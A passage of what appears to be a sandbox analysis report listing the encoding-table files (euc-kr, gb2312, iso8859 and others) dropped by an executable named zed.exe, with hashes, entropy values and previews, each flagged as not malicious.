                                                                                                                                                                                                                                            Entropy (8bit):2.4080588863614136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:4/vO7UlClqAd8XfpUqv+mCoKRuLbtMjnIxz0DY:4nO4N9fpv+ngLbiyEY
                                                                                                                                                                                                                                            MD5:103843B3A57168BD574F6CACC550D439
                                                                                                                                                                                                                                            SHA1:982652EA2B0DCFBB55970E019A4EDFBFCFAF9C24
                                                                                                                                                                                                                                            SHA-256:5448643398685456A11CBB93AF2321F70B8659E2FFF3CCC534B4D53BD2F38C89
                                                                                                                                                                                                                                            SHA-512:27A8DE6F97DB4A96E5D0132692A32A99DAB8A6C98973A0C4E50A219F2D2F364E63D657E5E8478B2706CA33C45C376F55B5BFCC9459E06AEA88BFCD4F0E32525C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-kr, multi-byte..M..003F 0 90..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):88033
                                                                                                                                                                                                                                            Entropy (8bit):2.3790651802316996
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:o4Is/C+0IwpRK1CkinIKUyNiNBzxOC4T/:LIsR0/RKckiIgNiDtOxT
                                                                                                                                                                                                                                            MD5:1A8E55DEA98B6D5EAC731ED233D3AD7C
                                                                                                                                                                                                                                            SHA1:1335FC0FC2AAE7E7F5EC42AC17A4168368B4A64D
                                                                                                                                                                                                                                            SHA-256:B4894AEDD2D5B5AE54B6D2840F7C89A88E9308EFD288F179E65936E172EF4B0D
                                                                                                                                                                                                                                            SHA-512:9DDCE366BA1196EB9FB913ACFDE8516BC9BB8D51894866D2E7E8CB313DC4D6C6D33C5A9E78142E83594DC423D10DA6F8DE211E69844B939198BC7DB9AED808F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb12345, double-byte..D..233F 0 83..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.270324851474969
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qrmHVBUlJvRj76OVbusZhAMiZyi77qN8VmKfkiJt0RMFS:qSMlZVnrAMiwMmNPYPFS
                                                                                                                                                                                                                                            MD5:D06664ACAA478BDEB42B63941109A4E3
                                                                                                                                                                                                                                            SHA1:4A6196FCC1BDE988C1A23EAA69745A9979F1AEFF
                                                                                                                                                                                                                                            SHA-256:ACD50951F81566C8D823670F9957B2479102EB5AE4CF558453E1D8436A9E31FF
                                                                                                                                                                                                                                            SHA-512:CB51A36B851FFDB5C6F9B9D0333EEA6A14CEF3796E0A60530198C16999D64E638047E873333630360299C9126F79CEDDA2D9F169028CED1FC04B1D3C55FFFC5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb1988, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..002000210022002300A500250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85912
                                                                                                                                                                                                                                            Entropy (8bit):2.3945751552930936
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:D47/S+i8vdx3Tz+hpHcBrQqKtrebjMIGCx8jE:0c873T6DHcBrbKtrVlE
                                                                                                                                                                                                                                            MD5:9357E05C74D6A124825F46A42B280C14
                                                                                                                                                                                                                                            SHA1:E5106ABE12D991AFE514F41E3B9E239202A4ADFE
                                                                                                                                                                                                                                            SHA-256:C445E4C9F676AE997D2DDA2BBC107B746F3547D85F39479951C56F46275EE355
                                                                                                                                                                                                                                            SHA-512:B2187D70A92FB38572BA46F3C3443233BEED1A4ABBFBA1B860F4BBAE6B3D8C16B8C9F52A20DAA12B2B8B40972E52F816860427B743530177E4CF0D8BA34EF381
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb2312, double-byte..D..233F 0 81..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86971
                                                                                                                                                                                                                                            Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                                            MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                                            SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                                            SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                                            SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.949409835601965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SOd5MNXVSVLqRIBXS4ovLE9sDXMVyXK9ow1Deq9Ts5dRPMSXcRA0kcR4X9cL+TXI:SVNFS0oyisLMsXK9okTw/BDSVKNw
                                                                                                                                                                                                                                            MD5:D3AC33390D31705FA4486D0B455247DF
                                                                                                                                                                                                                                            SHA1:2EE8613DC04A6FA84AB38FD5F3A2AA3FE330625B
                                                                                                                                                                                                                                            SHA-256:98074C85650A420A095ADA9138DA3A8A0AA4027BE47EA1E97A596F319EB084E9
                                                                                                                                                                                                                                            SHA-512:CB265B753C84968E2D1D6E706906DA9A7BB796D08F626290BCCA8F089771AFD176A9DC912773E8BA390D2AEC08592AD535C7D254E1DF92CF04848601481D4EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022-jp, escape-driven..E..name..iso2022-jp..init..{}..final..{}..ascii..\x1b(B..jis0201..\x1b(J..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):122
                                                                                                                                                                                                                                            Entropy (8bit):4.978693690727393
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SOd5MNXVTEXIBXS4ovLE9sDXNvdwUHEQwqc6XWxVUNOov:SVNFSoyisL/Zzc6mYNHv
                                                                                                                                                                                                                                            MD5:057CB0AA9872AC3910184F67AC6621BC
                                                                                                                                                                                                                                            SHA1:BBA47F9D76B6690C282724C3423BD94E2C320A04
                                                                                                                                                                                                                                            SHA-256:234811FC8B0F8FF2B847D9CC3982F1699DF1D21A43C74DCE45BA855D22520007
                                                                                                                                                                                                                                            SHA-512:019F187D2D16FB51BF627ACB7E67778857E56D4C160E0E5ACA6ABC05EC5FDB624CE2715CB9E0DAD73BFF9D697982BE0D539BC55BCCD368FC7C8EE0FFC04E9F61
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022-kr, escape-driven..E..name..iso2022-kr..init..\x1b$)C..final..{}..iso8859-1.\x0f..ksc5601..\x0e..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):240
                                                                                                                                                                                                                                            Entropy (8bit):4.95909788984399
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SVNFUXoyisLNcs9ozc6W4Twk0sRBDSVKN6tWIHRy:oUYcLNcTzczbwRYRy
                                                                                                                                                                                                                                            MD5:BB186D4BE3FA67DD3E2DEE82DD8BD628
                                                                                                                                                                                                                                            SHA1:93CE8627038780CFFF8C06E746DD5FB2B041115C
                                                                                                                                                                                                                                            SHA-256:741B4C842557EED2952936204D0AE9C35FA3A0F02F826D94C50C46976291797C
                                                                                                                                                                                                                                            SHA-512:4921E7AA3DB8E33609603FE129B97275DFF80CFB06648D2068FA7950246C67B9B530B74827638F69F4DFB8F55CDD4AA952EA72EAEB6ABB527D52F20C6B46FB51
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022, escape-driven..E..name..iso2022..init..{}..final..{}..iso8859-1.\x1b(B..jis0201..\x1b(J..gb1988..\x1b(T..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..jis0208..\x1b&@\x1b$B..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.236046263464657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:iyHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkL+rSMH+tKv:iyMlBVnrAMiwMmTmokLz0
                                                                                                                                                                                                                                            MD5:3538A970CD098BF5CE59005FE87B6626
                                                                                                                                                                                                                                            SHA1:285A96CC40D7CCE104FB4B407C7F0C400AA8F9CB
                                                                                                                                                                                                                                            SHA-256:A9CB4F4CA111608F882729BC5EB1C2F15530C515EF02DD2CA62F2D8DC5A210CF
                                                                                                                                                                                                                                            SHA-512:A6A6F2D8B5C22E240D195D168A604887062508FF3340D24E13BFCBD6C2E687347F2CFE724FA2ED12F36915B55EE2CFD901EC3F08E2B0A2FFD3BC2A98BBD12A50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-1, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.319750415373386
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:jHVBUlJvRj7SOVbusZhAMiZyi77qimXG2yM6q7KytC:jMlBVnrAMiwMmTXG2gytC
                                                                                                                                                                                                                                            MD5:CBDE40170FECD2496A9DA3CF770FAB7B
                                                                                                                                                                                                                                            SHA1:3E1D74DF6AFEB6CDE8ECBDAC8F81F2F9C64150DE
                                                                                                                                                                                                                                            SHA-256:48F4A239C25354F0E9F83A39F15D4632BB18A9C33E60C671C67307159917ECED
                                                                                                                                                                                                                                            SHA-512:A26B56A4CFE29E5A0A0B3A55283A7767397693388E2DEEC342C69B6F718FAE2407EB8D5ADE538FAE6947CBB8B052943C3A52F2D046ABAC7A3DAA86D730DC293F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-10, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010401120122012A0128013600A7013B011001600166017D00AD016A014A..00B0010501130123012B0129013700B7013C011101610167017E2015016B014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE00CF..00D00145014C00D300D400D500D6016800D8017200DA00DB00DC00DD00DE00DF..010100E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3206399689840476
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:6HVBUlJvRj7SOVbusZhAMiZyi77qimwHmEU4AyqU+TWwdd:6MlBVnrAMiwMmTf4AyqUSd
                                                                                                                                                                                                                                            MD5:E2A0BCB83BFC3F435CDCFC20D5CF2E0C
                                                                                                                                                                                                                                            SHA1:CFD18B5B5DB4EE46E63D912B8FD66D513C4C8D39
                                                                                                                                                                                                                                            SHA-256:21E769C5A66E4D12D6E7DB24022E92AF1EC0D0331FE3C8C605654F239C0F3640
                                                                                                                                                                                                                                            SHA-512:C86F9180F2F4A177F1EA10E26B0903ABEAFDDE0317C332A48F8D1BB586DAC91C68800E2E4FA2CD739C435419B106CBA4BEFC049F2BCD720E9FC2C0AE8436CFAC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-11, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.338879965076632
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:olHVBUlJvRj7SOVbusZhAMiZyi77qim2w4kBUioGnd2:olMlBVnrAMiwMmT/WNI2
                                                                                                                                                                                                                                            MD5:21CEBB723D47B1450A7FB21A82470B97
                                                                                                                                                                                                                                            SHA1:A40FD3AFE1ECE89E3F682D527D281BC563DB3892
                                                                                                                                                                                                                                            SHA-256:3271D39D7B4DCD841E8E5D5153D1B8837718B88FEFEC73DC37D314816EEFE5E5
                                                                                                                                                                                                                                            SHA-512:3A0E033A4D93C679215F672C6C4FE425D63E1DE157AA671E7400639165EC3EB498E4EEB030D6FB8FF8BE2FD8C986D341036A8CED9FA094D092CF2822D5DC065B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-13, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0201D00A200A300A4201E00A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B3201C00B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F010101070
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3670559016263915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:vHVBUlJvRj7SOVbusZhAMiZyi77qimhw6COlk1fKMH+tiH:vMlBVnrAMiwMmT/tlkQz0
                                                                                                                                                                                                                                            MD5:FDAA88946DE4EB4E6D37F2B6AFCF6CAF
                                                                                                                                                                                                                                            SHA1:56FC4773941E7457EA04EDA92C883642DE45D100
                                                                                                                                                                                                                                            SHA-256:F0A5675027FB1CA34B4E4128D24C2968CD275890569A32A86AFA4994CE4983E0
                                                                                                                                                                                                                                            SHA-512:92658A6FEB42A41B3CFFC377C4A9A3F6780A79FC596D3FEDBA6D3B3D75A9F40E859A2CE8DC579A278BAEEDEEFA2408E2B7853D99D5C2D14AACF63C521FE2BB86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-14, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A01E021E0300A3010A010B1E0A00A71E8000A91E821E0B1EF200AD00AE0178..1E1E1E1F012001211E401E4100B61E561E811E571E831E601EF31E841E851E61..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..017400D100D200D300D400D500D61E6A00D800D900DA00DB00DC00DD017600DF..00E000E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.260398494526282
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:mHVBUlJvRj7SOVbusZhAMiZyi77qimmRf4kL+rSMH+tKv:mMlBVnrAMiwMmTmCkLz0
                                                                                                                                                                                                                                            MD5:D779D5E2A0083C616A226B2D82ABF0EB
                                                                                                                                                                                                                                            SHA1:D1657DB5E2989EBA80BAB98A1E1217CFFFBB19DB
                                                                                                                                                                                                                                            SHA-256:C74E8E23A0FF0D5DEA7C318CA20DC817DA4E57B0DD61B3361FC0D5098A9316FE
                                                                                                                                                                                                                                            SHA-512:26E62BE8AE793ED3B725BF0D1BABF4D6ED63A6F3772ABD48955FC4394BDE5A47614D1FF89A21A828676BF1302F3C9361B557B0FBF0DF8561FB7E66542FE94CDC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-15, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A320AC00A5016000A7016100A900AA00AB00AC00AD00AE00AF..00B000B100B200B3017D00B500B600B7017E00B900BA00BB01520153017800BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3065938185320918
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:dHVBUlJvRj7SOVbusZhAMiZyi77qim0SmmPkYTtyL:dMlBVnrAMiwMmTttPkYpyL
                                                                                                                                                                                                                                            MD5:74FDEDDAF670023DA7751FB321E345A0
                                                                                                                                                                                                                                            SHA1:0677FED67C1333A9A74D50642E5214701A57E2AF
                                                                                                                                                                                                                                            SHA-256:640D977EC1D22B555C5075798DA009E3523E8F55F29BE22A3050CD1B4EF7B80E
                                                                                                                                                                                                                                            SHA-512:AC02FD95159A856A9DDEF4E6A8216B958DC07311B553FF39403DC5B77E1AFF2A2C4C03F5F26A2BB7AD5DB6800BEE03E895554556DBBFBE89426286796ADE55AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-16, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040105014120AC201E016000A7016100A9021800AB017900AD017A017B..00B000B1010C0142017D201D00B600B7017E010D021900BB015201530178017C..00C000C100C2010200C4010600C600C700C800C900CA00CB00CC00CD00CE00CF..0110014300D200D300D4015000D6015A017000D900DA00DB00DC0118021A00DF..00E000E100E201030
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.340505173539446
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:UHVBUlJvRj7SOVbusZhAMiZyi77qim/ssm5VO6ys2K:UMlBVnrAMiwMmT/ssYTys2K
                                                                                                                                                                                                                                            MD5:9B87850646FFE79F3C8001CBCB5BB3A1
                                                                                                                                                                                                                                            SHA1:8F97576F3FB3B5DBEF71DC2C9314AB5E530974D6
                                                                                                                                                                                                                                            SHA-256:76949B03F57041B07F41902BD7505AB3594D79AA8F7BDEED5F0481004B10CBC3
                                                                                                                                                                                                                                            SHA-512:101A28AF0799E7E0A5723E5DD76D5EF0FEEF584AC479A88F499CB3B7D2AA93767D72F8E51C76F7547F08FF8DD3CBBA7FF444BD07F99A92755526E75C596109EF
                                                                                                                                                                                                                                            Malicious:false
